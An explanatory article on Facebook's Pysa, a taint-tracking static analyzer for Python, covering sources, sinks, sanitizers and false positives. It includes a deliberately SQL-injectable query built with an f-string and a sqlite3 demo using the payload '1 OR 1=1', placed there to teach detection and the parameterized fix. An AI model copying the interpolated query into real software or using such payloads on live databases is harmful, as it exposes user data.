Pysa: A Tool to Prevent Security Vulnerabilities in Python

Pysa is an open-source static analysis tool built by Facebook to detect and prevent security and privacy issues in Python code. The name is short for Python Static Analyzer.

Pysa is a security-focused tool built on top of Pyre, Facebook's type checker for Python. It analyzes how data flows through code. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place it shouldn’t, which lets Pysa detect a wide range of issues.

Example: Facebook uses Pysa to check that its Python code makes proper use of certain internal frameworks, which are designed to prevent access to or disclosure of user data based on technical privacy policies.

Pysa also detects common web application security issues such as SQL injection and cross-site scripting (XSS). It helps Facebook scale its application security efforts for Python, most notably for the codebase that powers Instagram’s servers.

How Pysa Works

Pysa was developed with the lessons learned from Zoncolan, Facebook's static analyzer for Hack code, in mind. It uses the same algorithms to perform its analysis and even shares some code with Zoncolan. Pysa tracks flows of data through a program from sources, where the data originates, to sinks, where it should not end up. The most common kinds of sources are places where user-controlled data enters the application, like Django’s HttpRequest.GET dictionary. Sinks tend to be much more varied but can include APIs that execute code, such as eval, or that access the file system, such as os.open. Pysa performs several rounds of analysis to build summaries that record which functions have parameters that eventually reach a sink. When a source and a sink meet in the same function, Pysa reports an issue. Visualizing this process creates a tree with the issue at the apex and the sources and sinks at the leaves.
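The summary-building idea can be sketched in a few lines of Python. This is a toy illustration, not Pysa's actual algorithm or data structures: the call graph, the function names (handle_request, build_query, run_query, execute) and the helper params_reaching_sinks are all hypothetical. It repeats rounds over the call graph until no new parameter is found to reach a sink, then reports an issue where a user-controlled parameter appears in the resulting summaries.

```python
from typing import Dict, List, Set, Tuple

Param = Tuple[str, str]  # (function name, parameter name)

# Hypothetical toy program. Each caller lists the calls it makes; each call
# maps a callee parameter to the caller parameter that is passed into it.
CALLS: Dict[str, List[Tuple[str, Dict[str, str]]]] = {
    "handle_request": [("build_query", {"value": "user_input"})],
    "build_query": [("run_query", {"query": "value"})],
    "run_query": [("execute", {"sql": "query"})],
}

# Assumed sink: the 'sql' parameter of a hypothetical execute() function.
SINKS: Set[Param] = {("execute", "sql")}

# Assumed source: 'user_input' of handle_request is user-controlled.
SOURCES: Set[Param] = {("handle_request", "user_input")}


def params_reaching_sinks(
    calls: Dict[str, List[Tuple[str, Dict[str, str]]]],
    sinks: Set[Param],
) -> Set[Param]:
    """Iterate to a fixed point: which parameters eventually reach a sink?"""
    reaching = set(sinks)
    changed = True
    while changed:  # one pass of this loop is one "round" of analysis
        changed = False
        for caller, call_list in calls.items():
            for callee, arg_map in call_list:
                for callee_param, caller_param in arg_map.items():
                    candidate = (caller, caller_param)
                    if (callee, callee_param) in reaching and candidate not in reaching:
                        reaching.add(candidate)
                        changed = True
    return reaching


summaries = params_reaching_sinks(CALLS, SINKS)
issues = SOURCES & summaries  # a source that reaches a sink is an issue
print(sorted(issues))
```

The real analysis also has to handle return values, attributes, and many other language features; the sketch only follows parameters passed straight through calls.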

Positives and Negatives

According to Facebook engineers, Pysa produces some false positives and false negatives, and the team had to decide how to deal with both.

False positives occur when a tool reports that a security issue is present where none exists.
False negatives occur when a tool fails to detect and report when a real security issue is present.

Pysa offers two kinds of functionality that help users deal with false positives:

Sanitizers: These tell Pysa to stop following a data flow completely after it passes through a function or is assigned to an attribute. They allow users to encode their domain-specific knowledge about transformations that will always render data benign from a security perspective.
Features: These are little pieces of metadata that can be attached to flows of data as they are tracked through the code. Unlike sanitizers, features never remove an issue from Pysa’s results. Instead, the features attached to an issue can be used to filter the results after the analysis has run.
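The difference between the two mechanisms can be sketched as follows. This is a simplified model for illustration only, not Pysa's implementation or configuration format: the Flow type, the report_issues helper, and names such as escape_html, to_int, and the "converted-to-int" feature are all hypothetical. A sanitizer drops the flow during analysis, while a feature only annotates it so that it can be filtered afterwards.

```python
from typing import Dict, FrozenSet, List, NamedTuple, Set, Tuple


class Flow(NamedTuple):
    source: str            # kind of source, e.g. "UserControlled"
    sink: str              # kind of sink, e.g. "SQL"
    path: Tuple[str, ...]  # functions the data passes through on the way


def report_issues(
    flows: List[Flow],
    sanitizers: Set[str],
    feature_map: Dict[str, str],
) -> List[Tuple[Flow, FrozenSet[str]]]:
    """Drop sanitized flows; annotate the remaining ones with features."""
    issues = []
    for flow in flows:
        # Sanitizer: the analysis stops following the flow entirely.
        if any(step in sanitizers for step in flow.path):
            continue
        # Feature: metadata is attached, but the issue is still reported.
        features = frozenset(
            feature_map[step] for step in flow.path if step in feature_map
        )
        issues.append((flow, features))
    return issues


flows = [
    Flow("UserControlled", "SQL", ("build_query",)),
    Flow("UserControlled", "XSS", ("escape_html", "render")),
    Flow("UserControlled", "SQL", ("to_int", "build_query")),
]

issues = report_issues(
    flows,
    sanitizers={"escape_html"},
    feature_map={"to_int": "converted-to-int"},
)

# Filtering happens after the analysis, using the attached features.
likely_real = [flow for flow, features in issues if "converted-to-int" not in features]
print(len(issues), len(likely_real))
```

Here the XSS flow disappears because of the sanitizer, whereas the flow through to_int stays in the results and is only hidden by the later filter, so it remains available for other queries.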

Where Is Pysa Most Useful?

Imagine the following code was written to load a user's profile.


# views/user.py
from django.http import HttpRequest, HttpResponse

async def get_profile(request: HttpRequest) -> HttpResponse:
    # request.GET is user-controlled: this is the source
    profile = await load_profile(request.GET['user_id'])
    ...

# controller/user.py
async def load_profile(user_id: str):
    user = await load_user(user_id)  # Loads a user safely; no SQL injection
    pictures = await load_pictures(user.id)
    ...

# model/media.py
async def load_pictures(user_id: str):
    # user_id is interpolated directly into the SQL text
    query = f"""
       SELECT *
       FROM pictures
       WHERE user_id = {user_id}
    """
    result = await run_query(query)
    ...

# model/shared.py
async def run_query(query: str):
    connection = create_sql_connection()
    result = await connection.execute(query)  # the sink
    ...

The potential SQL injection in load_pictures is not exploitable because that function will only ever receive the valid user_id that resulted from calling load_user in the load_profile function.

Then, imagine that an engineer realizes that fetching the user and picture data concurrently would return results faster, and makes this change:

# controller/user.py
import asyncio

async def load_profile(user_id: str):
    user, pictures = await asyncio.gather(
        load_user(user_id),
        load_pictures(user_id)  # no longer 'user.id'!
    )
    ...

This change may look innocuous but ends up connecting the user-controlled user_id string directly to the SQL injection issue in load_pictures. In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully user-controlled, or that a SQL injection issue lurks in one of the functions called.
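To make the risk concrete, here is a minimal, self-contained sketch of what happens once a user-controlled string reaches a query built with string interpolation. It uses Python's built-in sqlite3 module and a made-up pictures table purely for illustration; the article does not say which database or driver the example application uses, and build_unsafe_query is a hypothetical stand-in for the f-string in load_pictures.

```python
import sqlite3


def build_unsafe_query(user_id: str) -> str:
    # Same pattern as load_pictures: the value is pasted into the SQL text.
    return f"SELECT * FROM pictures WHERE user_id = {user_id}"


conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE pictures (id INTEGER PRIMARY KEY, user_id INTEGER, url TEXT)"
)
conn.executemany(
    "INSERT INTO pictures (user_id, url) VALUES (?, ?)",
    [(1, "a.png"), (2, "b.png")],
)

# A user-controlled string that changes the meaning of the query.
malicious = "1 OR 1=1"

# Interpolated: the WHERE clause becomes "user_id = 1 OR 1=1".
unsafe_rows = conn.execute(build_unsafe_query(malicious)).fetchall()

# Parameterized: the whole string is treated as a single value.
safe_rows = conn.execute(
    "SELECT * FROM pictures WHERE user_id = ?", (malicious,)
).fetchall()

print(len(unsafe_rows), len(safe_rows))
```

With the interpolated query, the attacker's input returns every user's pictures; with the parameterized query, the same input matches nothing. Passing values as parameters is the usual fix for this class of issue, independent of whether a tool like Pysa flagged it.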

Open-Source Pysa

Facebook has made Pysa open source so that others can use the tool to find security issues in their own Python code. For projects built on open-source Python frameworks such as Django and Tornado, Pysa can find security issues from the first run, and in record time.

Limitations

There is no way to build a perfect static analyzer. Pysa also has some limitations that stem from its choice to detect security issues through data flow, together with design decisions that trade off performance against precision and accuracy.

Previously published behind a paywall: https://centocode.com/pysa-to-detect-and-prevent-security-issues-in-python-code-1437/